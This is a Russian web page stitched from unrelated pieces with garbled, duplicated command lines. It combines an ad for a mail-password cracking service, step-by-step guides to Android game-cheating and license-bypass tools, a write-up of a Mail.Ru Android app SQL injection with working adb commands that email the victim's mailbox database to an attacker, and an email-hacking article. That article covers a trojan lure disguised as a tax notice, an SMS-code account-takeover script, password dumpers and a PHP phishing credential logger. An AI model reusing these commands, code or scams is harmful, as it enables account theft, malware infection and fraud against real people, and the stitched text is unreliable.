Майл взлом хакер apk. Лучшие хакерские программы для взлома со смартфона

В настоящее время каждая компания, пользователь имеет почтовый адрес в сети интернет, для обслуживания как личных, так и служебных целей. Использование почтовых сервисов является неотьемлемой частью повседневной жизни. Не секрет что информация находящаяся в почте является важной, что и пораждает спрос на такую услугу как . Доступ к информации почтового ящика может понадобиться по разным причинам: возможно, вы потеряли пароль от собственного ящика и пытаетесь получить доступ к личным данным. Как вариант – кто-то посторонний уже вскрыл вашу почту и из «лучших» побуждений сменил пароль. Теперь вы не можете получить доступ к своей переписке, а в ящике хранится масса нужной информации. Программное обеспечение сайт, точнее ее система функционирует на основе перебора паролей и подбора более подходящего из них. В систему программы встроен специальный генератор паролей, который и является сердцем всей программы в целом. По времени программа работает очень быстро, так как имеет очень высокую скорость взлома. Но нужно учитывать, что чем сложнее пароль, тем больше времени займет на его восстановление или взлом. Также программа имеет высокую вероятность подбора пароля.

С появлением сайт стало возможно получить:

• Получить полный доступ к почтовому адресу и управление
• Возможность скачивание всех архивных файлов и документов
• Логин и пароль учетной записи для входа в профиль
• Входящих и исходящие пиьсма почтового адреса

Программное обеспечение основанное на комплексе методов позволяет быстро подобрать логин и пароль к аккаунту онлайн. Данная процедура осуществляется достаточно быстро и лично от вас не требует никакого вмешательства.

Остались вопросы? Мы с удовольствием на них ответим: Если Вы хотите оставить отзыв или внести какое – либо предложение, Вы можете сделать это в разделе

Если вы хотите взломать игру на своём телефоне или планшете, то вы на верном пути. В этой статье мы подробно расскажем о том, как и чем можно взломать игру на устройстве андроид. Этот вопрос волнует многих пользователей, что неудивительно - цены на покупку внутриигровой валюты часто неоправданно высокие.

Как взломать игру

На самом деле взломать игру для Андроид достаточно просто. Но, для этого вам понадобится помощь специальных программ (приложений), которые бывают двух видов:

1. Первый вид позволяет совершать в играх бесплатные покупки. Это самый простой способ, так как не требует от вас никаких сложных действий. Происходит такой взлом с помощью приложения, которое может обходить проверку лицензии Плей Маркета и подменять данные при оплате внутри игры.
2. Второй вид изменяет количество игровой валюты. Этот вид взлома более сложный, так как вам придётся вручную находить и менять необходимые числовые значения. Но когда вы научитесь и поймёте процесс, то сможете взламывать любые игры за несколько минут.

Большинство программ для взлома игр работают при наличии Root прав на устройстве, что это такое и как получить рут права описано в статье .

Также стоит отметить, что на андроиде взломать можно только оффлайн игры (не требующие доступ в интернет) и практически невозможно взломать онлайн-игры, такие как Clash of clans, Game of war, Boom beach и так далее. Связано это с тем, что все программы для взлома совершают подмену данных внутри самого устройства, а онлайн игры хранят данные на сервере, а не в устройстве. Если даже вам и удастся взломать online игру, то скорее всего после соединения с сервером данные восстановятся к предыдущим значениям или вы просто получите бан.

Взлом игр без рут прав

Представленные в этом разделе программы позволяют совершать взлом без рут прав. Минус этих приложений в том, что список поддерживаемых игр ограничен и как правило это простенькие игрушки со слабой защитой.

Приложение для взлома игр без root прав, с помощью которого можно совершать бесплатные покупки. На данный момент Крихак поддерживает около 100 игр, в их числе и Shadow Fight 2 (v1.7.0). Но имейте в виду, что программа не обновляется уже давно и разработчик объявил о прекращении поддержки, поэтому для взлома новых игр КриХак может не подойти.

Инструкция:

1. Отключите Гугл Плей и сервисы Google в настройках, нажатием на «Остановить процесс».
2. Затем отключите интернет или Wi-Fi.
3. Далее запускаем Крихак и сворачиваем или нажимаем кнопку «On» для активации взлома (в некоторых версиях активация происходит при запуске).
4. Заходим в приложение и совершаем любую покупку в магазине, если видите надпись - взлом сработал, то соответственно Creehack сработал.

Достаточно мощное приложение для редактирования и взлома APK файлов. Позволяет изменять содержимое АПК: строки локализации, заменять изображения фона, макет архитектуры, и даже удалять рекламу. В Плей Маркете доступно две версии Apk Editor - платная Pro версия и бесплатная.

Взлом игр с рут правами

В отличие от предыдущего раздела, в этом собраны более мощные программы, для работы которых вам понадобятся рут права.

Известная программа, которая позволяет делать бесплатные покупки в оффлайн играх андроид. Приложение подменяет сервер авторизации покупок и эмулирует покупку как настоящую. А если сказать проще, то Фридом создает виртуальную карту, при помощи которой вы бесплатно расплачиваетесь в приложениях.

Инструкция:

4.GAME KILLER

Одна из самых популярных программ для взлома игр на числовые значения (монеты, золото, кристаллы и т.д.). Гейм Киллер работает практически со всеми популярными играми, конечно кроме онлайн.

Инструкция:

1. Устанавливаем и запускаем GameKiller, затем сворачиваете его.
2. Заходим в игру, которую надо взломать.
3. Открываете гейм киллер, нажатием на значок ключа в углу, выбираете, что хотите взломать, к примеру монетки: для этого в строке поиска программы введите текущее количество монеток.
4. Теперь измените количество, для этого в приложении нужно совершить какое-то действие, например купить что-то (любым способом, главное, чтобы количество не было = 0).
5. Затем опять запускаем поиск в game killer по измененному значению (к примеру, у вас было 100 монет, 20 потратили - ищем 80).
6. Как правило, программа выдаст вам 1-2 результата, если все так и вышло - меняем их на нужные (например 9999999).
7. Если прога выдала намного больше результатов, то вам нужно будет повторить шаги 4 и 5.

Видео инструкция взлома игры с помощью GameKiller.

5. GAMECIH

Изменяет значения игровой валюты, аналог Game killer, поэтому инструкция такая же.

Описание процесса:

1. Скачиваем и запускаем GameCIH, затем сворачиваете его.
2. Запускаем игру, которую хотите взломать.
3. Открываете Гейм Цих, выбираете что именно, хотите взломать, к примеру кристаллы, для этого в поиск программы напишите текущее количество кристаллов.
4. Теперь измените это число, для этого вам необходимо совершить любое действие в игре, например купить что-то (главное, чтобы число получилось больше нуля).
5. Затем опять включаем поиск в GameCIH по отредактированному значению (к примеру, у вас было 150 монет, 50 потратили – ищем 100)
6. Обычно прога выдаёт 2-3 результата, если так и получилось, то меняем эти цифры на свои (например 9999999999).
7. Если результатов больше, то повторяем шаги 4-5.

6. XMOD GAMES

Универсальное приложение для упрощения процесса в онлайн играх, путём их модифицирования. Популярность XModGames получил в основном из-за игр Клеш оф Кленс и Бум Бич, установив плагин вы сможете настроить поиск противника с желаемым количеством ресурсов, а также активировать функцию «всегда онлайн». Приложение XMod постоянно обновляется и в него добавляются новые моды.

Патчер приложений Андроид, с функциями вырезки рекламы и проверки лицензии. Лаки Патчер может сканировать и вносить патчи, для изменения и расширения их функционала в ваши игры или приложения. Так же Lucky Patcher имеет функцию удаления проверки лицензии, что позволяет запускать «пиратские» версии приложений, игнорируя ограничения и алгоритмы защиты. Недавно в патчере появилась возможность замены оригинального Google Play Market’a на взломанный маркет.

1. Совершение бесплатных покупок в играх.
2. Удаление проверки лицензии.
3. Отключение рекламы.
4. Сохранение APK файлов из установленных приложений.
5. Внедрение патчей в приложения и систему.
6. Создание копий APK с внесенными изменениями.
7. Клонировать приложения (для одновременного запуска двух копий).

Случайным образом, копая очередной BugBounty, я натолкнулся на цепочку уязвимостей в достаточно популярном почтовом клиенте от IT-гиганта Mail.Ru. Эксплуатация уязвимостей из этой цепочки не требовала на устройстве особых прав и могла привести к полной компрометации содержимого почтового ящика жертвы или даже содержимого SD-карты. В статье я опишу методы, с помощью которых были найдены эти уязвимости, вспомогательные тулзы и финальный вектор с демонстрацией на видео.

Как взломать Mail.ru приложение?

Первым делом понадобится, конечно, девайс (или эмулятор), Android SDK tools , нужный нам APK, drozer и набор мелких утилит для декомпиляции и разбора Java-кода. Но обо всем по порядку.

Первым делом инсталлируем SDK Tools и настраиваем девайс/эмулятор. Я буду рассматривать реальный девайс, но только потому, что мне так удобнее, и вообще - комп с запущенным эмулятором греется! Права рута на устройстве сильно облегчают тебе жизнь, но для нахождения и эксплуатации многих уязвимостей они не требуются.

После настройки SDK Tools скачиваем и устанавливаем drozer из официального репозитория , ставим APK-клиент на устройство. Отлично, связанные с девайсом приготовления закончены, чтобы проверить работоспособность - подключаемся, пробросив порт (это делать необязательно, если используется реальный девайс из твоей сети, а не эмулятор):

$ adb forward tcp:31415 tcp:31415 $ drozer console connect 127.0.0.1

$ adb forward tcp : 31415 tcp : 31415 $ drozer console connect 127.0.0.1

Ну и конечно же, ставим на устройство само приложение почты Mail.Ru, которое будем ломать. Распаковываем и декомпилируем аппликуху при помощи утилиты dex2jar . Для просмотра и поиска по исходникам я советую использовать JD-GUI , ну или можешь взять любой другой редактор кода на твой вкус. Все готово, начинаем ресерч.

так выглядит успешно запущенная консоль drozer’а

ИЩЕМ ВЕКТОР АТАКИ ДЛЯ ВЗЛОМА MAIL.RU ПРИЛОЖЕНИЯ

Теперь дело за малым - найти уязвимости, продумать вектор и написать эксплоит. Начинаем со сканирования приложения: ищем то, за что можно будет зацепиться. Делается это при помощи drozer’а следующим образом:

dz> run app.package.attacksurface ru.mailru.app could not find the package: ru.mailru.app dz> run app.package.attacksurface ru.mail.mailapp Attack Surface: 26 activities exported 10 broadcast receivers exported 2 content providers exported 14 services exported

dz & gt ; run app .package .attacksurface ru .mailru .app could not find the package : ru .mailru .app dz & gt ; run app .package .attacksurface ru .mail .mailapp Attack Surface : 26 activities exported 10 broadcast receivers exported 2 content providers exported 14 services exported

Как видишь, у приложения довольно много экспортированных контент-провайдеров, с них я и предлагаю начать поиски. Команда run app.provider.info -a ru.mail. mailapp выведет нам список из двух провайдеров:

ru.mail.mailbox.contacts ru.mail.mailapp.images.cache

ru .mail .mailbox .contacts ru .mail .mailapp .images .cache

Кстати, можно оставить автоматическое сканирование провайдера drozer’у при помощи команды

dz> run scanner.provider.injection -a ru.mail.mailapp

dz & gt ; run scanner .provider .injection - a ru .mail .mailapp

Но я предпочитаю искать уязвимости руками, поэтому просто пробуем вызывать данный контент-провайдер непосредственно через adb при помощи команды am start , выполненной на устройстве. Повторюсь, так как контент-провайдер экспортирован, права root нам необязательны.

$ adb shell am start -d "content://ru.mail.mailapp.images.cache/ image_parameters/0"" Starting: Intent { dat=content://ru.mail.mailapp.images.cache/ image_parameters/0" }

image_parameters / 0 "" Starting : Intent { dat = content : / / ru .mail .mailapp .images .cache / image_parameters / 0 "}

Как можно увидеть, пользователю предложат выбрать, что же делать с данным URL, какой из Activity запускать. Чтобы избежать подобных вопросов, дополняем команду am параметром -n и указываем нужный нам активити, например ru.mail.mailapp/ru.mail.ui.writemail.SharingActivity . Приложение тут же завершится с ошибкой, а мы топаем в logcat, чтобы узнать, в чем проблема.

Подставляем кавычку, получаем ошибку SQL. Классика!

А проблема в том, что это типичная union-based SQL injection , которую можно классическим образом раскрутить и получить вывод (как на экран телефона, так и в системный лог):

$ adb shell am start -d "content://ru.mail.mailapp.images.cache/ image_parameters/0) union select 1,2,3,sqlite_version(),5,6,7,8-- /" -n ru.mail.mailapp/ru.mail.ui.writemail.SharingActivity ... Starting: Intent { dat=content://ru.mail.mailapp.images.cache/image_parameters/0) union select 1,2,3,sqlite_version(),5,6,7,8-- / cmp=ru.mail.mailapp/ru.mail.ui.writemail.SharingActivity }

$ adb shell am start - d "content : / / ru .mail .mailapp .images .cache / image_parameters / 0 ) union select 1 , 2 , 3 , sqlite_version () , 5 , 6 , 7 , 8 -- / "- n ru .mail .mailapp / ru .mail .ui .writemail .SharingActivity . . . Starting : Intent { dat = content : / / ru .mail .mailapp .images .cache / image_parameters / 0 ) union select 1 , 2 , 3 , sqlite_version () , 5 , 6 , 7 , 8 -- / cmp = ru .mail .mailapp / ru .mail .ui .writemail .SharingActivity }

$ adb logcat

E/BitmapFactory(15311): Unable to decode stream: java.io.FileNotFound Exception: /3.8.6: open failed: ENOENT (No such file or directory)

. . . E / BitmapFactory (15311 ) : Unable to decode stream : java .io .FileNotFound Exception : / 3.8.6 : open failed : ENOENT (No such file or directory )

Как оказалось, SQL-инъекции подвержен не только первый контент-провайдер, но еще и второй, доступный сторонним приложениям. Под него можно использовать следующий вектор:

$ adb shell am start -d "content://ru.mail.mailbox.contacts/account/ ") union select 1,2,3,4,3,6,7,8,9,10+" -n ru.mail.mailapp/ ru.mail.ui.writemail.SharingActivity

$ adb shell am start - d "content : / / ru .mail .mailbox .contacts / account / ") union select 1 , 2 , 3 , 4 , 3 , 6 , 7 , 8 , 9 , 10 + "- n ru .mail .mailapp / ru .mail .ui .writemail .SharingActivity

Чтобы понять, почему это происходит, предлагаю обратиться непосредственно к исходному коду декомпилированного приложения. Ответ кроется в файле, расположенном по адресу ru/mail/mailbox/content/contact/ ContactsProvider.java. Как видишь, результат выполнения функции getContactAccount() попадает сразу в SQL-запрос, не проходя никаких проверок, - это и позволяет злоумышленнику проводить инъекцию.

Выполняем union-based-инъекцию и получаем вывод в ошибке

РАСКРУЧИВАЕМ ИНЖЕКТ

Но этого мне было мало, я хотел получить полный доступ к файлам приложения (среди прочего и к файлу mailbox_db ), расположенным в системной папке в /data/data/ru.mail.mailapp/databases/ , где приложение хранит основную информацию, в том числе содержимое писем. Как можно было заметить ранее, содержимое одной из колонок отвечает за путь до прикладываемого к письму файла. Так как к файлу обращается само приложение, мы можем указать доступные именно приложению «Почта Mail.Ru» файлы, например /data/ data/ru.mail.mailapp/databases/mailbox_db.

Тогда выбранный вектор примет, например, следующий вид:

$ adb shell am start -d "content://ru.mail.mailbox.contacts/ account/") union select 111,"%2fdata%2fdata%2fru.mail. mailapp%2fdatabases%2fmailbox_db",333,444,555,666,777,888,99, 100500--+" -n ru.mail.mailapp/ru.mail.ui.writemail.SharingActivity

$ adb shell am start - d "content : / / ru .mail .mailbox .contacts / account / ") union select 111," % 2fdata % 2fdata % 2fru.mail. mailapp % 2fdatabases % 2fmailbox_db ", 333 , 444 , 555 , 666 , 777 , 888 , 99 , 100500 -- + "- n ru .mail .mailapp / ru .mail .ui .writemail .SharingActivity

Судя по тому, что файл приаттачился и ниже указан его реальный размер, можно сделать вывод, что вектор успешно сработал и мы «подгрузили» в письмо интересующий нас объект. Все бы ничего, но все равно нужно, чтобы пользователь отправил данное письмо с приложенным файлом…

Так как нам доступны некоторые экспортированные activity, среди них можно обнаружить следующий - ru.mail.ui.writemail. MailToMySelfActivity , который отвечает за автоматическую отправку писем «себе». Используем его в конечном векторе атаки, чтобы письмо сразу отправлялось без какого-либо участия со стороны пользователя. Добавляем к нему предыдущий вектор и в качестве extras указываем нашу почту и другие данные для отправки. Эти параметры, кстати, можно тоже нехитрым образом отыскать в исходном коде (буквально грепая по сорцам). Но я их как-то довольно быстро угадал и без подсказок.
".intent .extra .SUBJECT

"PWND" -- esa android .intent .extra .EMAIL "[email protected]" - n

ru .mail .mailapp / ru .mail .ui .writemail .MailToMySelfActivity

где EMAIL - наш почтовый ящик, на который придет письмо с указанным файлом (в данном случае это файл /data/ data/ru.mail.mailapp/databases/mailbox_db ).

Что же произойдет после запуска данной команды? Приложение запустится, через SQL injection вектор подгрузит указанный файл и выполнит отправку письма «самому себе», не игнорируя при этом наши передаваемые extras. Демонстрацию работы эксплоита можно посмотреть на видео.

ИТОГ

Таким образом, мы, используя описанную технику, можем без root-прав не только выполнять SQL-запросы к некоторым доступным таблицам, но и получать и сливать все файлы, доступные приложению. Повторюсь, что для этого вектора не нужны никакие действия на самом телефоне. Также стоит отметить, что использовать эту атаку сможет любое стороннее приложение, установленное на устройстве. Специально для проведения подобного рода атак на черном рынке существует услуга «инсталлов» твоего вредоносного приложения на большое количество устройств ни о чем не подозревающих пользователей.

Естественно, я сообщил обо всех уязвимостях в BugBounty Mail.Ru , но, к сожалению, вознаграждения не получил, а официальный ответ был такой:

«Few mistakenly exported Content providers and activities are reported to have vulnerabilities, allowing application data access and manipulation. This report was marked as a duplicate due to known fact activities and content providers are exported by mistake (fix is under development).»

Почему статус репорта изменился на None Applicable, хоть уязвимости и присутствовали в официальном приложении на момент репорта? Я не знаю, но продолжать искать уязвимости в продуктах и сервисах Mail.Ru мне теперь не особо хочется. Надеюсь, что другие в этом преуспеют лучше меня, в любом случае - удачи! 🙂

Как известно, Остап Бендер знал400 относительно честных способов отъема денег . Мы, к сожалению, таким богатством похвастаться не можем, однако с десяток постараемся набрать.

В этой статье мы не только расскажем теорию, но и покажем практику взлома. Методы взлома почты показываются сугубо из академических соображений, и мы не несем ответственности за противоправные действия, совершенные третьими лицами после прочтения данной статьи. Цель статьи - показать пользователям и администраторам возможные варианты взлома, чтобы знать, как от них защититься. Мы проверили описанные в статье методы на наших сотрудниках и полученными результатами были весьма удивлены. Поэтому данную статью можно рассматривать как руководство для администратора по проверке безопасности электронной почты на предприятии.

Далее будут рассмотрены десять различных способов взлома почтового ящика. У каждого способа своя эффективность и сложность. Единственная защита от всех способов взлома - это . Даже если кто-то и получит доступ к почтовому ящику, вряд ли он сможет прочитать сообщения, поскольку все они (или самые важные из них) будут зашифрованы.

Способ 1: используем троян

Довольно распространенным способом заполучения доступа к чужому ящику является рассылка электронных писем со встроенными вирусами. Точнее вирус встраивается не в само письмо, а письмо лишь содержит ссылку на вирус. Обычно содержание письма должно чем-то «зацепить» пользователя. Оно должно быть таким, на которое пользователь не сможет не отреагировать.

Примеры троянов - DarkComet RAT, SpyEye, Carberp. ОDarkComet RAT мы уже писали, оCarberp было написано на Хабре. АSpyEye - это наш отечественный троян, разработанный Александром Паниным, который даже засветился в сводках ФБР.

Мы использовали модифицированную версию трояна ZeuS. На момент создания (29.10.15) нашу версию не обнаруживал ни один антивирус (рис. 1), к тому же в нем была функция отключения процессов, среди которых есть Dr.Web. Однако на компьютере жертвы был установлен Comodo - так даже лучше.

В качестве жертвы мы выбрали бухгалтера нашей управляющей компании Юлию. Ради чистоты эксперимента она ничего не подозревала о том, что мы собираемся сделать. Думаю, об этом не стоило даже и говорить.

Итак, у нас есть модифицированный ZeuS, но как заставить Юлию запустить его? Если просто отправить ей ссылку, понятно дело, она переходить по ней не будет. Обещать золотые горы в письме - тоже прошлый век, на такое пользователи уже не реагируют.

Рис. 1. Отчет VirusTotal

Тогда мы решили отправить письмо якобы от имени Федеральной Налоговой службы (рис. 2). Мы выбрали то, что «зацепит» жертву.

Рис. 2. Письмо от налоговой

Чтобы поле From содержало внушительное название, а не [email protected], нами были подделаны заголовки письма. Это делается довольно просто, а как именно будет показано в способе 5. Пока не будем на это отвлекаться.
Как мы и рассчитывали, Юлия скачала программу и запустила инсталлятор обновления формы отчетности (рис. 3). Инсталлятор сделан с помощью Inno Setup за 5 минут. Именно он установит и запустит наш троян.

Рис. 3. Установка трояна

После этого мы можем полностью контролировать компьютер жертвы (рис. 4).

Рис. 4. Управление компьютером жертвы

Что мы можем? Мы можем ради интереса просмотреть список процессов компьютера, в котором, ясное дело, не будет нашего трояна (рис. 5). Мы можем просмотреть файловую систему (рис. 6).

Рис. 5. Список процессов на компьютере жертвы

Рис. 6. Файловая система на компьютере жертвы

Конечно, самое главное, ради чего все это затевалось - список паролей, сохраненных в браузере (рис. 7).

Рис. 7. А вот и пароли

Письмо и инсталлятор далеки от идеала, поскольку все делалось на скорую руку. Однако наша затея увенчалась успехом. Для достижения своей цели мы объединили целых два способа - социальный инженеринг и «поддельное» письмо. Оба эти способа будут рассмотрены далее.

Эффективность: средняя
Сложность: средняя
Стоимость: низкая

Способ 2: взлом по номеру телефона

Суть этого способа заключается в следующем. Злоумышленнику нужно знать номер телефона жертвы, указанный при регистрации почтового ящика. При сбросе пароля почтовая служба требует ввести последние символы номера телефона (или выбрать номер телефона из списка). На этот номер будет отправлено SMS с кодом подтверждения сброса пароля. Затем злоумышленник отправляет второе SMS с требованием указать код из предыдущего SMS.

Пользователь, ничего не подозревая, отправляет код из первой SMS. Самый большой недостаток этого способа в том, что первая SMS придет от Google, а вторая - с неизвестного номера. Успех этого способа зависит от сообразительности жертвы. Посмотрим на этот способ на практике.

Первым делом попытаемся просто сбросить пароль, после чего Google попросит ввести тот пароль, который мы помним. Понятное дело, пароль мы не помним, поэтому нажимаемкнопку Затрудняюсь ответить (рис. 8).

Рис. 8. Запрос на восстановление пароля

Далее если у вашей жертвы был привязан к аккаунту Android-телефон, то Google предложит отправить оповещение (рис. 9), которое выглядит, как показано на рис. 10. Примечательно, но смартфон не издал ни единого звука, а просто отобразил оповещение. Если он не будет перед глазами у пользователя, есть вероятность, что он его не заметит. Если же пользователь нажмет Нет, то не отчаивайтесь - повторите данный процесс несколько раз - позже поймете зачем.

Рис. 9. Предложение отправить оповещение

Рис. 10. Оповещение Google

После нажатия кнопкиОтправить оповещение откроется страница, изображенная на рис. 11. Перейдите по ссылке Сбросьте пароль другим способом. Откроется классическая страница сброса пароля через SMS-код (рис. 12). Эта же страница откроется, если к аккаунту не привязан Android-телефон.

Рис. 11. Инструкция по работе с оповещением

Рис. 12. Отправка SMS-кода

Настал кульминационный момент. Жертва получает код подтверждения Google (рис. 13).

Рис. 13. Код подтверждения

Предотвращена попытка входа в аккаунт Google. Перешлите код подтверждения Google для разблокировки аккаунта.

На рис. 14 показано, как выглядит это сообщение на экране телефона.

Рис. 14. Сообщение от злоумышленника

С одной стороны, пользователь может обратить внимание на неизвестный номер. С другой стороны, поставьте себя на место среднестатистического пользователя. Сначала он получает уведомление о сбросе пароля, потом SMS с кодом подтверждения, а после - сообщение о том, что замечена подозрительная активность. Конечно, можно все немного усложнить и завести короткий номер, с которого и будет отправлена SMS. Получить короткий номер с названием службы, например, Google Security,не проблема . Это только повысит вероятность успеха.

В нашем случае все получилось и без короткого номера. Мы получили код активации, который потом был указан на странице восстановления пароля. Таким образом, нам получилось сбросить пароль аккаунта и заполучить доступ к почтовому ящику.

Получение доступа к почтовому ящику - это еще не все. Чтобы жертва не догадалась, что ее ящик увели, после сброса пароля нужно создать временный пароль и отправить его по SMS, а самим тем временем сделать переадресацию на «хакерский» ящик. Так можно получить контроль над ящиком, не вызвав особых подозрений.

Рис. 15. Настройка переадресации

Эффективность: средняя
Сложность: низкая
Стоимость: низкая

Способ 3: доступ к компьютеру

Если у вас есть доступ к компьютеру жертвы, то можете считать, что почту вы уже взломали. Вы можете запустить на компьютере иликейлоггер или программу для «восстановления» паролей почтовых учетных записей.

Суть кейлоггера в том, что в специальный файл он записывает все, что пользователь вводит с клавиатуры. Вам останется только второй раз подойти к компьютеру, чтобы забрать результирующий файл (или получить его по почте).
К преимуществам кейлоггера относится то, что он записывает все подряд. Поэтому кроме паролей можно получить еще много интересной информации о своей жертве. Но и недостатков у них очень много. Самый существенный - большинство кейлоггеров успешно определяются антивирусами и если на компьютере жертвы установлен антивирус, использовать кейлоггер не получится. Ведь не всегда есть возможность отключить антивирус.

Второй недостаток вытекает из его достоинства. В результирующий файл помещается много лишней информации. Мало собрать информацию с клавиатуры, нужно еще отыскать среди всего лишнего то, что нужно - пароль.

Третий недостаток - если жертва использует почтовый клиент, а не веб-интерфейс, то кейлоггер вообще не поможет. Скорее всего, пароль уже введен в почтовый клиент и запомнен, поэтому жертва не вводит его каждый раз при проверке почты. Следовательно, кейлоггер запишет в файл все, что вводит пользователь, кроме того, что нужно вам.

Есть и еще один недостаток - если выбранный кейлоггер не поддерживает отправку результирующего файла по e-mail, то придется еще один раз подходить к компьютеру. Пример кейлоггера -SniperSpy - на случай, если вы захотите ним воспользоваться.

Программы для «восстановления» паролей почтовых учетных записей позволяют сразу получить все интересующие вас пароли без необходимости чтения мегабайтов текста в поиске нужного вам пароля. К тому же на них никак не реагирует антивирус. Одна из таких программ - этоMail PassView . Она позволяет восстановить пароли следующих почтовых учетных записей:

• Outlook Express
• Microsoft Outlook 2000 (POP3 and SMTP Accounts only)
• Microsoft Outlook 2002/2003/2007/2010/2013 (POP3, IMAP, HTTP and SMTP Accounts)
• Windows Mail
• IncrediMail
• Eudora
• Netscape 6.x/7.x
• Mozilla Thunderbird
• Group Mail Free
• Yahoo! Mail – если пароль сохранен в приложении Yahoo! Messenger.
• Hotmail/MSN mail – если пароль сохранен в приложении MSN Messenger.
• Gmail – если пароль сохранен в приложениях Gmail Notifier, Google Desktop или Google Talk.

Программу мы проверили на своих компьютерах и заявляем: она работает (рис. 16). На рис. 16 пароли, как и адреса e-mail затерты по понятным причинам.

Рис. 16. Программа Mail PassView

Mail PassView - не единственная программа в своем роде. Существуют и другие программы:

1. Outlook Password Decryptor - позволяет восстановить пароли из Outlook, в том числе самых последних версий (Outlook 2015, работающей под управлением Windows 10);
2. PstPassword - еще одна программа для восстановления паролей, сохраненных в Outlook;
3. WebBrowserPassView - программа для восстановления паролей, хранящихся в браузере. Поддерживаются браузеры IE, Chrome, Opera, Safari, Firefox.

Все, что нужно - это знать, какой почтовый клиент использует жертва. Найти программу для «восстановления» пароля из этого почтового клиента - не проблема. Если же жертва использует веб-интерфейс для чтения своего почтового ящика, тогда лучше использовать программу WebBrowserPassView. Она поддерживает все версии Windows, начиная с 2000 и заканчивая 10. Старые версии вроде 98/ME не поддерживаются.

Мы протестировали и эту утилиту. Программа успешно восстановила все пароли, хранящиеся в браузерах IE, Firefox, Chrome и Opera (Safari нами не тестировался, но, считаем, что и там будет полный «порядок»), см. рис. 17. Даже если вы не найдете среди этого списка пароль от почтового ящика, сей список будет тоже полезен - ведь люди часто используют одни и те же пароли для разных служб.

Рис. 17. Восстановленные пароли

Раз мы уже заговорили о восстановлении паролей, то вам может пригодиться программаDialupass , восстанавливающая dialup/RAS/VPN-пароли. Программа поддерживает Windows 2000, Windows XP, Windows 2003/2008, Windows Vista, Windows 7, Windows 8 и Windows 10

Эффективность: высокая
Сложность: низкая
Стоимость: низкая

Способ 4: социальная инженерия

Об этом способе не писал только ленивый. Много было уже сказано. Вам кажется, что этот способ не такой эффективный, как о нем говорят? Вы ошибаетесь.

Совсем недавно былавзломана почта директора ЦРУ Джона Бреннана. Абсурдность ситуации в том, что почту взломал не «матерый» хакер, а обычный подросток, правильно собрав информацию о своей «жертве». Подросток сначала связался с сотовым оператором, представившись сотрудником технической поддержки, уточнил детали аккаунта Бреннана.

После этого он позволил в AOL и, представившись Бреннаном, попросил сбросить его пароль. Поскольку он знал всю необходимую информацию (номер почтового аккаунта, последние цифры банковской карты, 4-значный PIN-код, номер телефона), пароль был сброшен и никто ничего не заподозрил.

Чуть позжеWikileaks опубликовал письма директора ЦРУ, см. рис. 18.

Рис. 18. Письма директора ЦРУ, опубликованные Wikileaks

Преимущество этого способа в том, что не нужно обладать никакими специальными знаниями и этот способ под силу любому. Успех этого метода зависит от смекалки «нападающего» - сможет ли он найти нужную информацию или нет.

Эффективность: высокая
Сложность: средняя
Стоимость: низкая

Способ 5: доверчивые пользователи (фишинг)

Попросим пользователя самого сообщить нам свой пароль. Нет, этот способ не подразумевает физического насилия и ни один из пользователей в результате эксперимента не пострадает. Во всяком случае, физически.

Суть этого метода в следующем: нужно создать фейк страницы авторизации того сервиса, который вы хотите взломать. Например, если вы хотите получить пароль от почты GMail.com, тогда нужно создать такую же страницу входа.
Далее нужно заманить пользователя на фейковую страницу. Это можно сделать несколькими способами:

• Отправить ему сообщение якобы от имени администрации того сервиса. В сообщении указать, что-то вроде «Вы давно не заходили в свой почтовый ящик. Если вы не воспользуетесь ним до <Д>.<М>.<Г>, он будет удален.». Рисуем кнопочкуВойти , нажав которую пользователь попадет на вашу страницу авторизации.
• Отправить сообщение со ссылкой, которая должна заинтересовать пользователя. Когда он перейдет по ней, он увидит сообщение о необходимости входа для просмотра содержимого. Сейчас многие сервисы позволяют войти с помощью учетной записи GMail или одной из социальных сетей. Так что пользователь может ничего и не заподозрить.

Очень часто описывается только «общее направление». Мы же попробовали реализовать его в собственной компании и посмотреть на реакцию обычных пользователей. Способ довольно непростой и для его реализации понадобятся, как навыки программирования на PHP, так и некоторые финансовые вложения. Ведь нам понадобится хостинг с поддержкой PHP (для выполнения PHP-сценария и размещения формы авторизации) и доменное имя, «похожее» на имя взламываемого сервиса. Конечно, опытный пользователь сразу заметит подлог, но посмотрим, как отреагируют самые обычные пользователи.

Рис. 19. Форма входа

Далее мы отправили некоторым сотрудникам сообщение о том, что их почтовый ящик будет заблокирован. Обратите внимание, что дизайн письма даже отдаленно (если не считать логотипа) не напоминает дизайн, используемый Google. Но, как показала практика, для наших пользователей этого было достаточно. Можно было бы взять исходный код письма, которое отправляет Google, сделать все более качественно. В реальных условиях злоумышленник так и сделает - будьте в этом уверены.

Рис. 20. Письмо, которое мы отправили пользователям

Что произошло дальше? Дальше пользователи прочитали письмо, перешли по ссылке и наивно ввели имя пользователя и пароль, которые были переданы сценарию. Сценарий принимает эти данные и записывает в текстовый файл. Написать такой сценарий сможет любой новичок, владеющий основами PHP. Примерный код сценария (это не тот сценарий, который использовали мы) приведен в листинге 1.

Листинг 1. Простейший сценарий записи паролей

// введенный логин $login = $_POST [ "Login" ] ; // браузер пользователя $browser = getenv ("HTTP_USER_AGENT" ) ; // Пароль $pass = $_POST [ "password" ] ; // Записываем полученные данные $text = "Login = $loginnPassword = $passnBrowser = $browser" ; // открываем файл $filelog = fopen ("log.txt" , "a+" ) ; // записываем строку fwrite ($filelog , "n $text n" ) ; fclose ($filelog ) ; // закрываем // перенаправляем пользователю на страницу входа в google, чтобы // меньше было подозрений header ("Location: https://accounts.google.com/ServiceLogin?service=mail&passive=true&rm=false&continue=https://mail.google.com/mail/&ss=1&scc=1) ;

Результат работы нашего сценария приведен на рис. 21.

Рис. 21. Результат работы сценария

Еще раз отметим, что все делалось на скорую руку. А для отправки сообщения использовалась почта Yahoo!, чтобы не бороться с антиспамом. Но можно было бы пойти и по иному пути. Например, найти сервер SMTP со свободной отправкой писем (без авторизации). Как правило, это будет неправильно настроенный SMTP-сервер какой-то небольшой организации. Списки таких серверов регулярно обновляются на специальных ресурсах. Думаю, не составит особого труда найти такой список, например,этот . Далее можно развернуть на локальном компьютеревеб-сервер с поддержкой PHP. Тогда у вас будет доступ к php.ini и можно будет указать SMTP-сервер, через который функция mail() будет отправлять письма.

